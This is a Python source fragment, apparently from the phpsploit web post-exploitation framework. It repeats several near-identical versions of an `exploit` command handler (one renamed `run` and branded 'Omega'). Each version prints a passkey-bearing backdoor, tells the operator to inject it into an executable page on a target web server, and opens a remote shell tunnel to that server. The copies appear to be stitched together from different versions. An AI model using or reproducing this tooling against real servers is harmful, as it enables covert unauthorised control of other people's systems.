def do_exploit(self, argv):
"""Spawn a shell from target server
SYNOPSIS:
exploit [--get-backdoor]
DESCRIPTION:
This command send an HTTP request to the remote server
url (defined by the $TARGET setting).
If $TARGET is correctly backdoored with the
phpsploit backdoor, the request remotely executes
the session opener in order to retrieve environment
variables, and spawn the phpsploit remote shell.
OPTIONS:
--get-backdoor
Only display current backdoor, as it should be
injected on the current or future target url.
NOTE: The $TARGET setting should be a valid http(s) url,
previously infected with the phpsploit backdoor.
"""
obj = str(session.Conf.BACKDOOR(call=False))
obj = obj.replace("%%PASSKEY%%", session.Conf.PASSKEY().upper())
if len(argv) > 1:
if argv[1] == "--get-backdoor":
print(obj)
return
else:
return self.interpret("help exploit")
print("[*] Current backdoor is: " + obj + "\n")
if tunnel:
m = ("[*] Use `set TARGET <VALUE>` to use another url as target."
"\n[*] To exploit a new server, disconnect from «{}» first.")
return print(m.format(session.Env.HOST))
elif session.Conf.TARGET() is None:
m = ("To run a remote tunnel, the backdoor shown above must be\n"
"manually injected in a remote server executable web page.\n"
"Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
return print(colorize("%BoldCyan", m))
else:
tunnel.open() # it raises exception if fails
def do_exploit(self, argv):
"""Spawn a shell from target server
SYNOPSIS:
exploit [--get-backdoor]
DESCRIPTION:
This command send an HTTP request to the remote server
url (defined by the $TARGET setting).
If $TARGET is correctly backdoored with the
phpsploit backdoor, the request remotely executes
the session opener in order to retrieve environment
variables, and spawn the phpsploit remote shell.
OPTIONS:
--get-backdoor
Only display current backdoor, as it should be
injected on the current or future target url.
NOTE: The $TARGET setting should be a valid http(s) url,
previously infected with the phpsploit backdoor.
"""
obj = str(session.Conf.BACKDOOR(call=False))
obj = obj.replace("%%PASSKEY%%", session.Conf.PASSKEY().upper())
if len(argv) > 1:
if argv[1] == "--get-backdoor":
print(obj)
return
else:
return self.interpret("help exploit")
print("[*] Current backdoor is: " + obj + "\n")
if tunnel:
m = ("[*] Use `set TARGET <VALUE>` to use another url as target."
"\n[*] To exploit a new server, disconnect from «{}» first.")
return print(m.format(session.Env.HOST))
elif session.Conf.TARGET() is None:
m = ("To run a remote tunnel, the backdoor shown above must be\n"
"manually injected in a remote server executable web page.\n"
"Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
return print(colorize("%BoldCyan", m))
else:
tunnel.open() # it raises exception if fails
def do_exploit(self, argv):
"""Spawn a shell from target server
SYNOPSIS:
exploit [--get-backdoor]
DESCRIPTION:
Connect to remote target URL (`help set TARGET`).
If backdoor (`exploit --get-backdoor`) is correctly
injected in target URL, phpsploit spawns a remote shell.
OPTIONS:
--get-backdoor
Display current backdoor code, as it should be
injected on target URL.
"""
obj = str(session.Conf.BACKDOOR(call=False))
obj = obj.replace("%%PASSKEY%%", session.Conf.PASSKEY().upper())
if len(argv) > 1:
if argv[1] == "--get-backdoor":
print(obj)
return True
self.interpret("help exploit")
return False
print("[*] Current backdoor is: " + obj + "\n")
if tunnel:
m = ("[*] Use `set TARGET <VALUE>` to use another url as target."
"\n[*] To exploit a new server, disconnect from «{}» first.")
print(m.format(session.Env.HOST))
return False
if session.Conf.TARGET() is None:
m = ("To run a remote tunnel, the backdoor shown above must be\n"
"manually injected in a remote server executable web page.\n"
"Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
print(colorize("%BoldCyan", m))
return False
return tunnel.open() # it raises exception if fails
def do_run(self, argv):
"""Spawn a shell from target server.
USAGE:
run
DESCRIPTION:
Connect to remote target URL (`help set TARGET`).
If payload (`run --get-payload`) is correctly
injected in target URL, Omega spawns a remote shell.
OPTIONS:
--get-payload
Display current payload code, as it should be
injected on target URL.
"""
obj = str(session.Conf.PAYLOAD(call=False))
obj = obj.replace("%%PASSKEY%%", session.Conf.PASSKEY().upper())
if len(argv) > 1:
if argv[1] == "--get-payload":
print(obj)
return True
self.interpret("help run")
return False
print("[*] Current payload is: " + obj + "\n")
if tunnel:
m = ("[*] Use `set TARGET <value>` to use another url as target."
"\n[*] To exploit a new server, disconnect from «{}» first.")
print(m.format(session.Env.HOST))
return False
if session.Conf.TARGET() is None:
m = ("To run a remote tunnel, the payload shown above must be\n"
"manually injected in a remote server executable web page.\n"
"Then, use `set TARGET <payloaded_url>` and run `run`.")
print(colorize("%BoldCyan", m))
return False
return tunnel.open() # it raises exception if fails
def do_exploit(self, argv):
"""Spawn a shell from target server
SYNOPSIS:
exploit [--get-backdoor]
DESCRIPTION:
Connect to remote target URL (`help set TARGET`).
If backdoor (`exploit --get-backdoor`) is correctly
injected in target URL, phpsploit spawns a remote shell.
OPTIONS:
--get-backdoor
Display current backdoor code, as it should be
injected on target URL.
"""
obj = str(session.Conf.BACKDOOR(call=False))
obj = obj.replace("%%PASSKEY%%", session.Conf.PASSKEY().upper())
if len(argv) > 1:
if argv[1] == "--get-backdoor":
print(obj)
return True
self.interpret("help exploit")
return False
print("[*] Current backdoor is: " + obj + "\n")
if tunnel:
m = ("[*] Use `set TARGET <VALUE>` to use another url as target."
"\n[*] To exploit a new server, disconnect from «{}» first.")
print(m.format(session.Env.HOST))
return False
if session.Conf.TARGET() is None:
m = ("To run a remote tunnel, the backdoor shown above must be\n"
"manually injected in a remote server executable web page.\n"
"Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
print(colorize("%BoldCyan", m))
return False
return tunnel.open() # it raises exception if fails